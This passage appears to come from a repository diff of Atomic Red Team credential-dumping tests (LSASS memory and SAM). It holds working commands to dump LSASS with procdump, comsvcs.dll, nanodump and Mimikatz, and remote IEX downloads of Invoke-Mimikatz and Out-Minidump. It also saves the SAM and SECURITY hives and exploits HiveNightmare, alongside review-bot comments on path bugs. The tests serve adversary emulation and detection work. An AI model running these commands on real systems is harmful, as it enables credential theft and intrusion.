#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
```
#### Cleanup Commands:
```powershell
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: .Net v5 must be installed
##### Check Prereq Commands:
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
```
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
<br/>
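Review bot: Two defects in the content this hunk deletes are worth carrying into whatever replaces it. In Atomic Test #4 the attack command runs `%temp%\nanodump.x64.exe`, but the prerequisite check and the download both use `PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe`, so the dependency passes while the attack step fails on a missing file; make the two paths agree (and the description's `nanondump.dmp` should read `nanodump.dmp`). In Atomic Test #9 the Inputs default `PathToAtomicsFolder..\ExternalPayloads\procdump.exe` is missing the `\` between `PathToAtomicsFolder` and `..` that Test #1 has, and its Get Prereq block omits the `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line Test #1 sets before `Invoke-WebRequest`. Atomic Test #3's description also leaks YAML escaping into the rendered markdown (`C:\\windows\\temp\\dumpert.dmp`, `\"The system cannot find the path specified.\"`), which the doc generator should unescape.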
-354
@@ -1,354 +0,0 @@
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
supported_platforms:
- windows
executor:
command: |
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
cleanup_command: |
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
supported_platforms:
- windows
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
- description: |
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
command: |
#{dumpert_exe}
cleanup_command: |
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
prereq_command: |
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
executor:
command: |
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
cleanup_command: |
del "%temp%\nanodump.dmp" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the Lsass dump
type: path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
- description: |
Lsass dump must exist at specified location (#{input_file})
prereq_command: |
cmd /c "if not exist #{input_file} (exit /b 1)"
get_prereq_command: |
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
executor:
command: |
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live lsa
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with createdump.exe from .Net v5
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
.Net v5 must be installed
prereq_command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
get_prereq_command: |
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
executor:
command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
cleanup_command: |
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
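Review bot: the default for `procdump_exe` (`default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe`) is missing the backslash after `PathToAtomicsFolder`, so after substitution the path reads `<atomics>..\ExternalPayloads\procdump.exe` and neither the `Test-Path` prereq check nor the `Copy-Item ... #{procdump_exe}` in the get_prereq_command lines up with the `PathToAtomicsFolder\..\ExternalPayloads\` form the rest of that dependency uses; it should be `PathToAtomicsFolder\..\ExternalPayloads\procdump.exe`. The NanoDump test at the top of this hunk has a related mismatch: the dependency downloads and checks `PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe`, but the executor runs `%temp%\nanodump.x64.exe`, a location nothing in the test populates, so the test will pass its prereq check and then fail. Separately, the Out-Minidump test fetches its script from `master` via IEX (`https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1`) while the NanoDump and Invoke-Mimikatz tests pin a commit SHA; pinning here as well keeps the test reproducible and avoids executing whatever `master` serves on the day it runs.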
-130
View File
@@ -1,130 +0,0 @@
function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
.PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
.PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
.EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
.EXAMPLE
Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
.EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
.INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
.OUTPUTS
System.IO.FileInfo
.LINK
http://www.exploit-monday.com/
#>
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}
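Review bot: `$MiniDumpWriteDump` is invoked in PROCESS (`$MiniDumpWriteDump.Invoke($null, @($ProcessHandle, ...`) without checking that the reflection lookup in BEGIN actually found the method; `GetMethod` returns `$null` when the non-public `WindowsErrorReporting+NativeMethods` type or its `MiniDumpWriteDump` member is absent from the running PowerShell build, and the caller then sees an opaque null-method error rather than a message saying the host lacks the internal API this function depends on. Suggest a guard after the lookup, e.g. `if (-not $MiniDumpWriteDump) { throw 'MiniDumpWriteDump not found in System.Management.Automation' }`, and wrapping the Invoke in try/finally so `$FileStream.Close()` runs even when Invoke throws; as written, an exception from Invoke skips both the Close and the partial-dump `Remove-Item`, leaving an open handle on a half-written `lsass_<pid>.dmp`. Minor: `[ValidateScript({ Test-Path $_ })]` on `$DumpFilePath` accepts an existing file as well as a directory, and `Join-Path` would then build a nonsensical path; `Test-Path $_ -PathType Container` matches the documented intent.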
-336
View File
@@ -1,336 +0,0 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | string | SAM|
| copy_dest | Destination of the copied file | string | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `command_prompt`!
```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
```
#### Cleanup Commands:
```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `powershell`!
```powershell
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
#### Cleanup Commands:
```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
